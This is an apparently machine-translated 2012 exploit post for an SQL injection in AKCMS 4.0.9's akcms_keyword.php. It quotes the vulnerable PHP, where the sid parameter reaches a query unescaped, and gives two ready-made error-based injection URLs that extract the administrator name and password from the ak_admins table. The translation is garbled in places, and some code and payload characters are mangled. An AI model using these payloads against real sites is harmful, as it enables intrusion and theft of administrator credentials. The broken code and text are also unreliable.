akcms4. 0. 9 sql injection exp-vulnerability warning-the black bar safety net

2012-05-01T00:00:00
ID MYHACK58:62201233765
Type myhack58
Reporter 佚名
Modified 2012-05-01T00:00:00

Description

I also stumbled do not know there is no human hair.

The vulnerability appears in: akcms_keyword.php

<? php$i = strpos(FILE,'akcms_keyword.php');$mypath = substr(FILE,0, $i);include $mypath.'akcms_config.php';include $mypath.$ system_root.'/ fore/keyword.php';?& gt;system_root is and the background of the directory corresponding to the<? php$system_root ='admin';$foreload =1;?& gt;

在 看看 admin/fore/keyword.php

<? phpif(! isset($_GET['sid'])||! isset($_GET['keyword']))exit();require_once $mypath.$ system_root.'/ include/common.inc.php';require_once AK_ROOT.'include/forecache.func.php';$forecache = getforecache($currenturl);require_once(AK_ROOT.'include/global.func.php');require_once(AK_ROOT.'include/fore.inc.php');$sid = $_GET['sid'];$keyword = $_GET['keyword'];$se = getsedata($sid);$k = $db->get_by('*','keywords',"sid='$sid' AND keyword='". addslashes($keyword)."'"); if(! isset($template)) $template = $se['template'];$variables = array();$variables['template']= $template;$variables['html']=0;$variables['sid']= $sid;$variables['num']= $k['num'];$variables['keyword']= $keyword;$variables['keyword_url']= urlencode($keyword);$variables['keyword_html']= htmlspecialchars($keyword);$html = render_template($variables); if($forecache ===false) setforecache($currenturl, $html);if(substr($html,0,5)=='<? xml') header('Content-Type:text/xml;charset='.$ header_charset);echo $html;require_once(AK_ROOT.'include/exit.php');?& gt;

Administrators really engage. the$keyword to a magic escape without the sid=$sid escapes this, I kind of Don't understand.

Well look at the

$db->get_by functions. in fact are not seeing is a select

function get_by($what, $from, $where ="){ $table = $this->fulltablename($from); $sql ="SELECT {$what} FROM {$table}";if($where !=") $sql .=" WHERE {$where}";if(strpos($what,'(')===false) $sql .=" LIMIT 1"; $row = $this->get_one($sql);if($row ===false){returnfalse;} elseif(count($row)==1){return current($row);}else{return $row;}}

In get_by no filter

Thus triggeredsql injectionvulnerability

!

exp:

The administrator account

http://localhost/akcms4.0.9/akcms_keyword.php?sid=11111'and(select 1 from(select count(),concat((select (select (select concat(0x7e,0x27,editor,0x27,0x7e) from ak_admins limit 0,1)) from information_schema. tables limit 0,1),floor(rand(0)2))x from information_schema. tables group by x)a)

and '1'='1&keyword=1 1

Administrator password

http://localhost/akcms4.0.9/akcms_keyword.php?sid=11111'and(select 1 from(select count(),concat((select (select (select concat(0x7e,0x27,password,0x27,0x7e) from ak_admins limit 0,1)) from information_schema. tables limit 0,1),floor(rand(0)2))x from information_schema. tables group by x)a)

and '1'='1&keyword=1 1

by sword the lone line